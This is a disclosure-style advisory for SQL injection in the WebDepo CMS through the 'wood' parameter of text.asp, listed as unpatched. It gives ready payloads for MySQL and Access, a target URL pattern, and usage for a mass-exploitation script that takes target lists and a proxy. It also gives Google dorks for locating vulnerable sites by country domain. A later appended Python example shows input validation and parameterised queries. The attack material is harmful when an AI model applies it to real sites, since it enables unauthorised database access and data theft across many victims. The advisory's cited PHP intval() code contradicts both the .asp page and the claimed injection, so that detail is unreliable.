Advisory: SQLi vulnerabilities in application CMS WebDepo
Affected web application: Application CMS WebDepo (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day
==========================
Vulnerability Description:
==========================
The records and client practice management application CMS WebDepo suffers from multiple SQL injection vulnerabilities.
==========================
Technical Details:
==========================
SQL can be injected through the following GET parameter:
GET VULN: wood=(id)
$wood=intval($_REQUEST['wood'] )
==========================
SQL injection vulnerabilities
==========================
Injection is possible through the file text.asp
Exploit-Example:
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT( 0x496e75726c42726173696c, 0x3a3a,version(),(SELECT (CASE
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND( 0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_ SETS GROUP BY x)a)
DBMS: 'Microsoft Access'
Exploit:
+UNION+ALL+SELECT+NULL,NULL, NULL,CHR(113)&CHR(112)&CHR( 120)&CHR(112)&CHR(113)&CHR(85) &CHR(116)&CHR(106)&CHR(110)& CHR(108)&CHR(90)&CHR(74)&CHR( 113)&CHR(88)&CHR(116)&CHR(113) &CHR(118)&CHR(111)&CHR(100)& CHR(113),NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL
FROM MSysAccessObjects%16
Ex: http://target.us/text.asp?wood=(id)+Exploit
==========================
SCRIPT EXPLOIT
==========================
http://pastebin.com/b6bWuw7k
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
==========================
GOOGLE DORK
==========================
inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="
==========================
Solution:
==========================
Sanitizing all requests coming from the client
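
One way to apply this fix to the wood parameter, as an added example that is not part of the original advisory or the vendor's code: accept only a plain decimal id after URL decoding, then pass it to the database as a bound parameter. The table "texts", its column "body", the SQLite stand-in database and the sample request lines are assumptions constructed for the illustration.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed request lines for illustration (not from a real server log).
SAMPLE_REQUESTS = [
    "GET /text.asp?wood=12 HTTP/1.1",
    "GET /text.asp?wood=12+AND+1=1 HTTP/1.1",
    "GET /text.asp?wood=7+UNION+ALL+SELECT+NULL HTTP/1.1",
    "GET /text.asp?wood=%31%32 HTTP/1.1",
    "GET /index.asp?page=2 HTTP/1.1",
    "GET /text.asp?wood=3&wood=4 HTTP/1.1",
]

_DIGITS = re.compile(r"[0-9]{1,9}")  # ASCII digits only, bounded length

def parse_wood(raw):
    """Return wood as an int, or None if it is not a plain decimal id."""
    if raw is None or not _DIGITS.fullmatch(raw):
        return None
    return int(raw)

def check_request(line):
    """Classify a request line as 'ok', 'reject' or 'n/a' (another page)."""
    parts = line.split(" ")
    if len(parts) != 3:
        return "reject"
    url = urlsplit(parts[1])
    if not url.path.lower().endswith("/text.asp"):
        return "n/a"
    values = parse_qs(url.query, keep_blank_values=True).get("wood", [])
    # Exactly one value, validated after URL decoding.
    if len(values) != 1 or parse_wood(values[0]) is None:
        return "reject"
    return "ok"

def demo_db():
    """Build a constructed in-memory database with a hypothetical schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE texts (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("INSERT INTO texts VALUES (12, 'hello')")
    return conn

def fetch_text(conn, raw_wood):
    # Validate first, then bind: the value is never concatenated into SQL.
    wood = parse_wood(raw_wood)
    if wood is None:
        return None
    row = conn.execute("SELECT body FROM texts WHERE id = ?", (wood,)).fetchone()
    return row[0] if row else None
```

The same check_request function can be run over existing access logs to find requests to text.asp whose wood value was not a plain id.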
==========================
Credits:
==========================
AUTHOR: Cleiton Pinheiro / Nick: googleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin: http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
==========================
References:
==========================
[1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
[2] https://msdn.microsoft.com/en-us/library/ff648339.aspx